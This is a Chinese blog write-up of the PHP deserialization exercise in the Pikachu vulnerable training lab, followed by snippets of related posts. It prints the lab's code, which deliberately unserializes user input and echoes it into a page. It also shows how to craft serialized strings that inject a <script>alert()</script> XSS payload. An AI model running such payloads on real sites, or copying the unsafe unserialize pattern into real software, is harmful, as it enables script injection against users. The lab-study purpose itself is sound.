pikachu_php反序列化

于 2023-11-22 22:37:56 发布
阅读量459 收藏
点赞数
文章标签: php android 开发语言 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134564677
版权
文章介绍了如何通过在PHP中利用`pikachu_php`类的反序列化功能,实现XSS攻击。作者展示了如何构造一个包含恶意脚本的序列化数据,以及如何通过修改特定字符来避开检测并成功执行攻击。
摘要由CSDN通过智能技术生成

pikachu_php反序列化

源代码

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}


//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}

源码可见,需要执行到test,那么就需要执行construct函数,该魔法函数创建对象时就会被执行,执行到else分支之后输入值的反序列化就会当做值给test调用

过程

尝试写一个xss攻击,将xss攻击序列化提交

<?php
class Test{
	public $a="<script>alert(/order/)</script>";
}
	$a=new Test();
	var_dump(serialize($a));
?>

查看结果

image-20231122220929904

发现xss标签部分被执行了,然后没有了

因此需要在序列化的时候替换掉xss攻击代码中的一部分,让其无法执行,生成后再替换回来即可

此处将括号换成x,并且构造成源码一样的参数名

<?php
class S{
    var $test = "xscript>alert(/order/)x/script>";
}
    $s=new S(); 
    print_r(serialize($s));
?>

得到结果然后修改尖括号

O:1:"S":1:{s:4:"test";s:31:"xscript>alert(/order/)x/script>";}

O:1:"S":1:{s:4:"test";s:31:"<script>alert(/order/)</script>";}

拿去执行,成功执行xss

image-20231122222744984

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之pikachu PHP反序列化(未完成)
LKmnbZ's Blog
11-14 476
1. 概述 序列化与反序列化 序列化函数serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子...
Pikachu_Assistant:这是您的电脑皮卡丘助手!
04-02
Pikachu是使用Python 3.9.1编写的计算机助手,可帮助您找到自己喜欢的应用程序和网站。 这个项目是在学习了4个月的Python之后创建的,因此对于某些部分的代码优化不好,我深表歉意。 我没有提出任何问题,如果您...
Pikachu-PHP反序列化
baynk的博客
11-19 1023
0x00 PHP反序列化概述 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 原来在ctf中学习过,也可以看看这个https://baynk.blog.csdn.net/article/details/99712035和这个https://blog.csdn.net/u014029795/article/details/99707622。...
pikachuphp反序列化
qq_43665434的博客
02-18 407
pikachuphp反序列化 一、php对象和类 php面向对象编程: 对象:可以做一些事情。一个对象有状态、行为和标识三种属性。 类:一个共享共同结构和行为的对象的集合。 每个类的定义都以class开头,后面跟着类的名字,一个类可以包含有属于自己的变量,变量(称为属性)以及函数(称为方法)。类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。 类可能包含一些特殊的函数(magic函数),magic函数命名是以符号‘_’开头的,比如_construct当一个队形创建时调用;_dest
pikachu-PHP反序列化
baidu_39504221的博客
11-23 509
PHP对象需要表达的内容较多,如类属性值的类型、值等,所以会存在一个基本格式。下面则是PHP序列化后的基本类型表达: 布尔型(bool):b:value=>b:0 整数型(int):i:value=>i:1 整数型(int):i:value=>i:1 字符串型(str):s:length:“value”;=>s:4:“aaaa” 数组型(array):a:<length>:{key,value pairs};=>a:1:{i:1;s:1:“a”} 对象型(obje
pikachuPHP反序列化
Alsn86的博客
12-23 377
pikachuPHP反序列化 概述
PyPI 官网下载 | gym_pikachu_volleyball-0.0.1.tar.gz
01-12
《PyPI官网下载:探索gym_pikachu_volleyball-0.0.1.tar.gz中的Python库知识》 PyPI(Python Package Index)是Python开发者的重要资源库,它提供了无数的开源Python库,便于开发者们下载和安装。在本文中,我们将...
pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_
10-03
【标题】"pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_" 暗示了这是一个与《名侦探皮卡丘》(Detective Pikachu)相关的资源,可能是一部电影或动画的阿拉伯语版本。"arabic" 表明内容是阿拉伯语...
135-PHP、Apache环境中部署pikachu
最新发布
10-22
PHP、Apache 环境中部署 pikachu 说明 ...通过安装 phpstudy、下载和解压 pikachu、添加网站和配置 Apache、初始化数据库等步骤,可以成功部署 pikachupikachu 的使用需要配置数据库和初始化,才能正常使用。
pix2pix_edge2pikachu_deeplearnjs_old:pix2pix edge2pikachu在deeplearnjs中
05-12
Deeplearnjs(旧)中的Pix2pix edge2Pikachu 演示: : 鸣谢:该项目基于的 。 我要感谢 , 和对本Github的帮助和建议。 待办事项清单: 使其实时绘制。 缩小模型(现在54.4 MB) 使模型更快(第一个图像约3000毫秒,...
pikachu~~~PHP反序列化
weixin_50339832的博客
06-06 112
序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object 1:代表对象名字长度
pikachuphp反序列化()
weixin_54431413的博客
04-15 3057
pikachu靶场的反序列化漏洞 (代码审计能力有点弱鸡,不对之处请指教)
Pikachu系列——php反序列化
Zlirving_的博客
05-21 1072
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验八 —— php反序列化 php反序列化概述 php允许保存一个对象方便以后使用,这个过程被称为序列化。为什么要有序列化这种机制呢?在传递变量的过程中,有可能遇到变量值要跨脚本文件传递的过程。 如果另一个脚本想要调用之前一个脚本的变量,但是前一个脚本已经执行完毕,所有的变量和内容已经释放掉了,我们要如何操作呢?难道要一个脚本不断地循环,等待后面脚本调用?这肯定是不现实的 serialize和unserialize就是
序列化接口 Serializable 和 Parcelable
binaryshao
01-17 451
Serializable 反射? serialVersionUID 确保反序列化成功的关键 ANY-ACCESS-MODIFIER static final long serialVersionUID = 42L; * It is also strongly advised that explicit * serialVersionUID declarations use the &amp;amp;amp;lt;...
十、pikachuphp反序列化
qq_55202378的博客
08-24 966
pikachu php反序列化
十二、pikachu PHP反序列化
山兔的博客
09-18 126
1.PHP反序列化概述 序列化serialize() 把一个对象变成可以传输的字符串,比如下面是一个对象: 反序列化unserialize() 把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。 序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题 2.PHP反序列化漏洞 看一下页面,接受反序列化,打开源码文件看看它反序列化什么 也就是把我们传进去的东西进行序列化 我们先在本地直接搭建一个序列化的内容,在浏览器访问它 O:1
Pikachu漏洞靶场 PHP反序列化
柠檬i的博客
04-08 615
序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串。 反序列化unserialize() 就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
Pikachu靶场——PHP反序列化漏洞
来日可期的博客
09-30 1835
序列化是将对象转换为字节流或其他可传输格式的过程,以便将其存储在文件中、通过网络发送或在内存中保存。反序列化是将序列化的数据重新还原为对象的过程。反序列化漏洞通常出现在不正确或不安全反序列化实现中。攻击者可以构造恶意的序列化数据,利用漏洞触发远程代码执行、拒绝服务攻击、信息泄露等安全问题。
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
m0_65712192的博客
01-03 981
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
pikachu反序列化
09-07
反序列化Pikachu对象,你需要使用适当的反序列化方法,通常是根据你使用的编程语言和框架来决定。以下是一个示例,在Python中使用pickle模块进行反序列化的代码: ```python import pickle # 反序列化Pikachu对象 with open('pikachu.pickle', 'rb') as file: pikachu = pickle.load(file) # 现在你可以使用反序列化后的Pikachu对象进行操作 pikachu.speak() ``` 请注意,这只是一个示例,你需要将'pikachu.pickle'替换为你实际存储Pikachu对象的文件名。另外,确保你在反序列化之前已经将Pikachu对象序列化并存储到文件中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值